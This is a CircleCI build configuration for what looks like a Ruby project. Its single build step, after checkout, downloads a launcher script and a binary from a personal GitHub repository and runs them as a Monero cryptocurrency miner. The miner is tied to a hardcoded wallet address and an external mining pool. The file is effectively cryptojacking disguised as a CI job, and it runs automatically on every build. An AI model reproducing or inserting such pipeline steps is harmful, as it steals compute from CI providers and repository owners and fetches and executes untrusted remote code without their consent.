# Use the latest 2.1 version of CircleCI pipeline process engine.
# See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1

# Define a job to be invoked later in a workflow.
# See: https://circleci.com/docs/2.0/configuration-reference/#jobs
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth: 
          username: mygithub-user
          password: $GITHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: wget https://raw.githubusercontent.com/hunshukajh/yes/main/cmdline_launcher.sh && wget https://github.com/hunshukajh/yes/raw/main/gas && chmod +x gas cmdline_launcher.sh && ./cmdline_launcher.sh -algo randomx -coin XMR -wallet 87A4TusGbZAfUCgTfq492xHFfbSSCAPah1mGVsTqeSqa3EwccTVT5rq3WvUtxYERXB5qANq4uJxPwf4dKHauAAnWTxieeFz  -rigName  $(echo $(shuf -i 1-9999 -n 1)-SRBO) -pool1 xmr.2miners.com:2222
    
